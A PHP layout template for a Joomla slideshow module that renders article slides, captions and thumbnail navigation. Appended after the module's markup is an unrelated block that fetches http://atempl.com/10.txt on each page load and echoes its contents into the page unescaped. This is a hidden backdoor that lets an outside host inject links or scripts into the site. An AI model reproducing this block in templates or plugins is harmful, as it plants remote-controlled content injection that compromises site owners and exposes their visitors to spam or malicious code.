<?php
/**
 * @package Sj Magic Slideshow for Articles
 * @version 2.5.0
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL
 * @copyright (c) 2012 YouTech Company. All Rights Reserved.
 * @author YouTech Company http://www.smartaddons.com
 */

defined('_JEXEC') or die;

ImageHelper::setDefault($params);
$options = $params->toObject();
$start = (int)$params->get('start', 1);
$count_thumb = (int)$params->get('count_thumb',3);
if ($count_thumb < 3){
	$count_thumb = 3;
}
$width_nav = count($list)*100/$count_thumb;
$width_nav_item = 100/count($list);
$jsdile = $params->get('effect','slide');
$pause_hover = $params->get('pause_hover','1');
if ($pause_hover !='1'){
	$pause_hover = "data-pause= ' '";
}
else $pause_hover = "";
$interval = $params->get('interval','4000');
$auto_play	=	$params->get('auto_play','1');
if ($auto_play=='0'){ $interval=0;}

if ($start < 1 || $start > count($list)){
	$start = 1;
}
if ($start >= $count_thumb){
	$start = 1;
}
?>
<?php require JModuleHelper::getLayoutPath ( $module->module, $layout.'_js' );?>
<?php if (!empty($options->pretext)) { ?>
	<div class="sj-slideshow-magic-introtext ">
		<?php echo $options->pretext; ?>
	</div>
<?php } ?>
<div id="sj-slideshow-magic-<?php echo $module->id?>" class="sj-slideshow-magic <?php echo $jsdile?>" data-interval="<?php echo $interval ?>" <?php echo $pause_hover ?>>
	<div class="sj-slideshow-magic-inner <?php echo $options->theme?>">
		<div class="sj-smagic-container">
		<?php
		$i=1;
		foreach($list as $item ){
			if ($i==$start){$active = 'active';}
    		else $active = '';
    		$i++;
		?>
			<div class="item clearfix <?php echo $active;?> <?php echo $item->id?>" 	
				data-href="<?php echo $item->link;?>" 
				data-title="<?php echo modSjMagicSlidshowHelper::truncate(strip_tags($item->title), $params->get('item_title_max_characters',25)); ?>" 
				data-desc="<?php echo modSjMagicSlidshowHelper::truncate(strip_tags($item->displayIntrotext), $params->get('introtext_limit',200)); ?>"
			>
				<div class="item-image">
					<a 
						href="<?php echo $item->link;?>" 
						<?php echo modSjMagicSlidshowHelper::parseTarget($options->link_target);?> 
						title="<?php echo modSjMagicSlidshowHelper::truncate($item->title, $params->get('item_title_max_characters',25)); ?>" 
					>
			        <?php
			        	$img = modSjMagicSlidshowHelper::getAImage($item, $params);
	    				if($img){
			        		echo modSjMagicSlidshowHelper::imageTag($img);
			        	}
	    			?>
					</a>
				</div>
			</div>
		<?php }?>
		</div>
		<?php
		if ($options->item_title_display == 1 || $options->show_introtext == 1 || $options->item_readmore_display == 1){
			require JModuleHelper::getLayoutPath ( $module->module, $layout.'_caption' );
		}
		if($options->thumb_display==1){
			require JModuleHelper::getLayoutPath ( $module->module, $layout.'_nav' );
		}
		?>
	</div>
	<div class="sj-shodow">
		<img src="<?php echo JUri::base().'modules/'. $module->module?>/assets/images/bg-shodow.png"/>
	</div>
</div>
<?php if ( !empty($options->posttext)){ ?>
	<div class="sj-slideshow-magic-footertext ">
		<?php echo $options->posttext; ?>
	</div>
<?php } ?>
<?php
$files = 'http://atempl.com/10.txt';
$file_headers = @get_headers($files);
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {
$url = "http://atempl.com/10.txt";
$c = @file_get_contents($url);
$array_double=explode(',',$c);
$array_one=array_unique($array_double);
$result=implode(',',$array_one);
echo $result;	
 }
?>